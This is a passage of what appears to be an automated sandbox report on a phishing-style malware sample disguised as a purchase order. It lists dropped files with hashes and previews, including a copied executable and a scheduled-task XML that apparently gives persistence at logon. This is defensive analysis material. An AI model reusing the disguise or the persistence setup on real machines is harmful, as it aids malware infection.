                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):2232
                                        Entropy (8bit):5.379460230152629
                                        Encrypted:false
                                        SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//MPUyus:fLHyIFKL3IZ2KRH9Ougss
                                        MD5:47AE6B38874AA66FC6688784E5F2EF18
                                        SHA1:AF71A58235AE5D80BDDA79DE907697354E5553F6
                                        SHA-256:F271AAB7854518D80F39793CBA35D7BFDABBFBCAC9DBD8F5E79EAE393BDC4C98
                                        SHA-512:D8FD735141FBF25FE4EFB88E973F4416A50EC0E065A297BC8B398FF96AD77EE852EA2E66BD3CAFED7C4C9EE9D24742C3D95F03DD13DBC6C1B57BFDB2F40EF1A3
                                        Malicious:false
                                        Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ydipv32.rch.psm1

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a4hijodc.ge5.ps1

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_buvsfm2e.pk3.ps1

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hywbxmih.pi5.ps1

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qv1b5osh.meo.psm1

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uo2lwk0v.0hh.ps1

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vcpniucf.tvs.psm1

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z5iets4r.baj.psm1

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\tmp981A.tmp

                                        Download File
                                        Process:C:\Users\user\AppData\Roaming\jDCErdK.exe
                                        File Type:XML 1.0 document, ASCII text
                                        Category:dropped
                                        Size (bytes):1573
                                        Entropy (8bit):5.110119248095621
                                        Encrypted:false
                                        SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta2xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTBv
                                        MD5:C993DA026775D008D6DAE002CA580725
                                        SHA1:874A2E6007B94F1E45A38D65DD5D3673FB2E14AF
                                        SHA-256:4E6400DDA4404D133A9CEFB173535FBCC3C2E0A545F9C5C2EF9A7BD77B53F325
                                        SHA-512:8BF0DC8BC0C99F3766B8BB7E2B644C39F5F827BFCA241B7DA0A86CE64BEBF3B885674086B21EF8B959A2355ED9E8E5EA090D27B41A6BC7140526A201BA4A93B8
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                        C:\Users\user\AppData\Local\Temp\tmpA55D.tmp

                                        Download File
                                        Process:C:\Users\user\Desktop\purchase order - PO-011024-201.exe
                                        File Type:XML 1.0 document, ASCII text
                                        Category:dropped
                                        Size (bytes):1573
                                        Entropy (8bit):5.110119248095621
                                        Encrypted:false
                                        SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta2xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTBv
                                        MD5:C993DA026775D008D6DAE002CA580725
                                        SHA1:874A2E6007B94F1E45A38D65DD5D3673FB2E14AF
                                        SHA-256:4E6400DDA4404D133A9CEFB173535FBCC3C2E0A545F9C5C2EF9A7BD77B53F325
                                        SHA-512:8BF0DC8BC0C99F3766B8BB7E2B644C39F5F827BFCA241B7DA0A86CE64BEBF3B885674086B21EF8B959A2355ED9E8E5EA090D27B41A6BC7140526A201BA4A93B8
                                        Malicious:true
                                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                        C:\Users\user\AppData\Roaming\jDCErdK.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\purchase order - PO-011024-201.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):1000960
                                        Entropy (8bit):7.143847466881891
                                        Encrypted:false
                                        SSDEEP:12288:IB+YbtCIcFevvXu7HIlHEHoeCrhISRGOdv1NIbZVBR2Y1xGcCN74sUV2pIPdI7nV:cQ89lF1RGOd9NsXX2hNzUV2G8RQfk9
                                        MD5:62B9604FF6CE5A82D5270041DCD2F3FE
                                        SHA1:880C5CE3BB2F391B8FA2FF5764ED0DC905C3A9E6
                                        SHA-256:E3308F1DD36BD61758447D5C6EB6E90ADABC65E1119BBBE78537C3E3B622835C
                                        SHA-512:D09E5E215457173260FFFA63D0313645146214B720EB4917ACB642606022EB0148A2486EDE2D7272E06DB73AD0431AAFDA1EBC2A15FA36A759AFEDA1234E852B
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 32%
                                        • Antivirus: Virustotal, Detection: 35%, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....9................0..(...........F... ...`....@.. ....................................@.................................SF..O....`...............6.. (..............p............................................ ............... ..H............text....&... ...(.................. ..`.rsrc........`.......*..............@..@.reloc...............D..............@..B.................F......H............]......b........"..........................................&.(......*^.(........}......}....*z.(........}......}......}....*....0..[..........~....s........s......o....o......o.....o.......o........&.....o.........,..o........+..*.......0..;..........<J.......0..l........s.....~....s........s.............,...o....o......o.....o......s ......o!......o"...&....,..o.........+...*........GY.......0..g..........~....s........s......o....o......o.....o.......o........&

                                        C:\Users\user\AppData\Roaming\jDCErdK.exe:Zone.Identifier

                                        Download File
                                        Process:C:\Users\user\Desktop\purchase order - PO-011024-201.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Preview:[ZoneTransfer]....ZoneId=0

                                        C:\Windows\INF\WmiApRpl\WmiApRpl.h

                                        Download File
                                        Process:C:\Windows\System32\wbem\WMIADAP.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):3444
                                        Entropy (8bit):5.011954215267298
                                        Encrypted:false
                                        SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
                                        MD5:B133A676D139032A27DE3D9619E70091
                                        SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
                                        SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
                                        SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
                                        Malicious:false
                                        Preview://////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai

                                        C:\Windows\INF\WmiApRpl\WmiApRpl.ini

                                        Download File
                                        Process:C:\Windows\System32\wbem\WMIADAP.exe
                                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (405), with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):48786
                                        Entropy (8bit):3.5854495362228453
                                        Encrypted:false
                                        SSDEEP:384:esozoNc1+12zG1+b61ubSGMLVrj4+PtC81ZBg4Lg4ung4og4uo91K91zI91K91z2:esozozBg4Lg4ung4og4uWG4MG4o1
                                        MD5:DF877BEC5C9E3382E94FEA48FEE049AC
                                        SHA1:1D61436C8A1C057C1B1089EB794D90EE4B0D8FE9
                                        SHA-256:7F0F3FA64E41A30BACA377B6399F8F7087BC54DA9FCA876BFDC2C2EEECA8454B
                                        SHA-512:433CB16EBE2292CB60CB8CE71207EBB752295FB73E6D13E215E771EC5FC433EE29577AF28641255810C18078B95F04A9D37734B6F49CB6A6302821E365672205
                                        Malicious:false
                                        Preview:.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././....././....././. .C.o.p.y.r.i.g.h.t. .(.C.). .2.0.0.0. .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....././....././. .M.o.d.u.l.e. .N.a.m.e.:....././. .W.m.i.A.p.R.p.l....././....././. .A.b.s.t.r.a.c.t.:....././....././. .D.e.s.c.r.i.b.e.s. .a.l.l. .t.h.e. .c.o.u.n.t.e.r.s. .s.u.p.p.o.r.t.e.d. .v.i.a. .W.M.I. .H.i.-.P.e.r.f.o.r.m.a.n.c.e. .p.r.o.v.i.d.e.r.s....././....././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.............[.i.n.f.o.].....d.r.i.v.e.r.n.a.m.e.=.W.m.i.A.p.R.p.l.....s.y.m.b.o.l.f.i.l.e.=.W.m.i.A.p.R.p.l...h.........[.l.a.n.g.u.a.g.e.s.].....0.0.9.=.E.n.g.l.i.s.h.....0.0.9.=.E.n.g.l.i.s.h.........[.o.b.j.e.c.t.s.].....W.M.I._.O.b.j.e.c.t.s._.0.0.

                                        C:\Windows\System32\PerfStringBackup.INI

                                        Download File
                                        Process:C:\Windows\System32\wbem\WMIADAP.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):840878
                                        Entropy (8bit):3.4224066455051885
                                        Encrypted:false
                                        SSDEEP:3072:xJQGb/6IPolY/OhyIGmZkzTMWcnqgspmTbQiIJEDc3dv+eBrq2Bw+1wQ5xcEkc7+:01nqgsp2gOKih3
                                        MD5:D3ED23A3E63ACA8CF656C585568DA6D7
                                        SHA1:1A499D7E9A030D53B2A4DBD36F6F14B6531A6094
                                        SHA-256:AE5A6E258A41298BE6CF2B3DA812E992E1D6A3C7FBC7DD4AA8B413DA850E8B65
                                        SHA-512:21E2953B0819567865DA9C80A7D07021D7ED48F4BA3CD843C42D13D18E0E8FB27FA2F7C4EC86D4A1F4D887146F0F7E9E05B6A53D85398EA43240C2E180D52E00
                                        Malicious:false
                                        Preview:........[.P.e.r.f.l.i.b.].....B.a.s.e. .I.n.d.e.x.=.1.8.4.7.....L.a.s.t. .C.o.u.n.t.e.r.=.1.0.1.2.2.....L.a.s.t. .H.e.l.p.=.1.0.1.2.3.........[.P.E.R.F._...N.E.T. .C.L.R. .D.a.t.a.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.8.4.0.....F.i.r.s.t. .H.e.l.p.=.6.8.4.1.....L.a.s.t. .C.o.u.n.t.e.r.=.6.8.5.2.....L.a.s.t. .H.e.l.p.=.6.8.5.3.........[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.8.2.8.....F.i.r.s.t. .H.e.l.p.=.6.8.2.9.....L.a.s.t. .C.o.u.n.t.e.r.=.6.8.3.8.....L.a.s.t. .H.e.l.p.=.6.8.3.9.........[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g. .4...0...0...0.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.9.0.0.....F.i.r.s.t. .H.e.l.p.=.6.9.0.1.....L.a.s.t. .C.o.u.n.t.e.r.=.6.9.2.6.....L.a.s.t. .H.e.l.p.=.6.9.2.7.........[.P.E.R.F._...N.E.T. .D.a.t.a. .P.r.o.v.i.d.e.r. .f.o.r. .O.r.a.c.l.e.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.8.9.1.6.....F.i.r.s.t. .H.e.l.p.=.8.9.1.7.....L.a.s.t. .C.o.u.n.t.e.r.=.8.9.4.4.....L.a.s.t. .H.e.l.p.=.8.9.4.5.........[.P.E.R.F._...N.E.

                                        C:\Windows\System32\PerfStringBackup.TMP

                                        Download File
                                        Process:C:\Windows\System32\wbem\WMIADAP.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):840878
                                        Entropy (8bit):3.4224066455051885
                                        Encrypted:false
                                        SSDEEP:3072:xJQGb/6IPolY/OhyIGmZkzTMWcnqgspmTbQiIJEDc3dv+eBrq2Bw+1wQ5xcEkc7+:01nqgsp2gOKih3
                                        MD5:D3ED23A3E63ACA8CF656C585568DA6D7
                                        SHA1:1A499D7E9A030D53B2A4DBD36F6F14B6531A6094
                                        SHA-256:AE5A6E258A41298BE6CF2B3DA812E992E1D6A3C7FBC7DD4AA8B413DA850E8B65
                                        SHA-512:21E2953B0819567865DA9C80A7D07021D7ED48F4BA3CD843C42D13D18E0E8FB27FA2F7C4EC86D4A1F4D887146F0F7E9E05B6A53D85398EA43240C2E180D52E00
                                        Malicious:false
                                        Preview:........[.P.e.r.f.l.i.b.].....B.a.s.e. .I.n.d.e.x.=.1.8.4.7.....L.a.s.t. .C.o.u.n.t.e.r.=.1.0.1.2.2.....L.a.s.t. .H.e.l.p.=.1.0.1.2.3.........[.P.E.R.F._...N.E.T. .C.L.R. .D.a.t.a.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.8.4.0.....F.i.r.s.t. .H.e.l.p.=.6.8.4.1.....L.a.s.t. .C.o.u.n.t.e.r.=.6.8.5.2.....L.a.s.t. .H.e.l.p.=.6.8.5.3.........[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.8.2.8.....F.i.r.s.t. .H.e.l.p.=.6.8.2.9.....L.a.s.t. .C.o.u.n.t.e.r.=.6.8.3.8.....L.a.s.t. .H.e.l.p.=.6.8.3.9.........[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g. .4...0...0...0.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.6.9.0.0.....F.i.r.s.t. .H.e.l.p.=.6.9.0.1.....L.a.s.t. .C.o.u.n.t.e.r.=.6.9.2.6.....L.a.s.t. .H.e.l.p.=.6.9.2.7.........[.P.E.R.F._...N.E.T. .D.a.t.a. .P.r.o.v.i.d.e.r. .f.o.r. .O.r.a.c.l.e.].....F.i.r.s.t. .C.o.u.n.t.e.r.=.8.9.1.6.....F.i.r.s.t. .H.e.l.p.=.8.9.1.7.....L.a.s.t. .C.o.u.n.t.e.r.=.8.9.4.4.....L.a.s.t. .H.e.l.p.=.8.9.4.5.........[.P.E.R.F._...N.E.

                                        C:\Windows\System32\perfc009.dat

                                        Download File
                                        Process:C:\Windows\System32\wbem\WMIADAP.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):137550
                                        Entropy (8bit):3.409189992022338
                                        Encrypted:false
                                        SSDEEP:1536:X1i4nfw8ld9+mRDaUR28oV7TYfXLi7NwrgSwNu56FRtg:XBnfw8ld9+mRDaUR28oV7TY+7S0ba
                                        MD5:084B771A167854C5B38E25D4E199B637
                                        SHA1:AE6D36D4EC5A9E515E8735525BD80C96AC0F8122
                                        SHA-256:B3CF0050FAF325C36535D665C24411F3877E3667904DFE9D8A1C802ED4BCD56D
                                        SHA-512:426C15923F54EC93F22D9523B5CB6D326F727A34F5FF2BDE63D1CB3AD97CAB7E5B2ABABBC6ED5082B5E3140E9342A4E6F354359357A3F9AEF285278CB38A5835
                                        Malicious:false
                                        Preview:1...1.8.4.7...2...S.y.s.t.e.m...4...M.e.m.o.r.y...6...%. .P.r.o.c.e.s.s.o.r. .T.i.m.e...1.0...F.i.l.e. .R.e.a.d. .O.p.e.r.a.t.i.o.n.s./.s.e.c...1.2...F.i.l.e. .W.r.i.t.e. .O.p.e.r.a.t.i.o.n.s./.s.e.c...1.4...F.i.l.e. .C.o.n.t.r.o.l. .O.p.e.r.a.t.i.o.n.s./.s.e.c...1.6...F.i.l.e. .R.e.a.d. .B.y.t.e.s./.s.e.c...1.8...F.i.l.e. .W.r.i.t.e. .B.y.t.e.s./.s.e.c...2.0...F.i.l.e. .C.o.n.t.r.o.l. .B.y.t.e.s./.s.e.c...2.4...A.v.a.i.l.a.b.l.e. .B.y.t.e.s...2.6...C.o.m.m.i.t.t.e.d. .B.y.t.e.s...2.8...P.a.g.e. .F.a.u.l.t.s./.s.e.c...3.0...C.o.m.m.i.t. .L.i.m.i.t...3.2...W.r.i.t.e. .C.o.p.i.e.s./.s.e.c...3.4...T.r.a.n.s.i.t.i.o.n. .F.a.u.l.t.s./.s.e.c...3.6...C.a.c.h.e. .F.a.u.l.t.s./.s.e.c...3.8...D.e.m.a.n.d. .Z.e.r.o. .F.a.u.l.t.s./.s.e.c...4.0...P.a.g.e.s./.s.e.c...4.2...P.a.g.e. .R.e.a.d.s./.s.e.c...4.4...P.r.o.c.e.s.s.o.r. .Q.u.e.u.e. .L.e.n.g.t.h...4.6...T.h.r.e.a.d. .S.t.a.t.e...4.8...P.a.g.e.s. .O.u.t.p.u.t./.s.e.c...5.0...P.a.g.e. .W.r.i.t.e.s./.s.e.c...5.2...B.r.o.w.s.e.r...5.4...A.n.n.o.u.

                                        C:\Windows\System32\perfh009.dat

                                        Download File
                                        Process:C:\Windows\System32\wbem\WMIADAP.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):715050
                                        Entropy (8bit):3.278818886805871
                                        Encrypted:false
                                        SSDEEP:3072:NUdGNuowE4j0PrRZnpETMDZ8M6d0PHHx643/A5BK9YXdhPHlVziwC4ALWI1dnmRh:78M6d0w+WB6I
                                        MD5:342BC94F85E143BE85B5B997163A0BB3
                                        SHA1:8780CD88D169AE88C843E19239D9A32625F6A73E
                                        SHA-256:F7D40B4FADA44B2A5231780F99C3CE784BCF33866B59D5EB767EEA8E532AD2C4
                                        SHA-512:0A4ED9104CAFCE95E204B5505181816E7AA7941DED2694FF75EFABAAB821BF0F0FE5B32261ED213C710250B7845255F4E317D86A3A6D4C2C21F866207233C57E
                                        Malicious:false
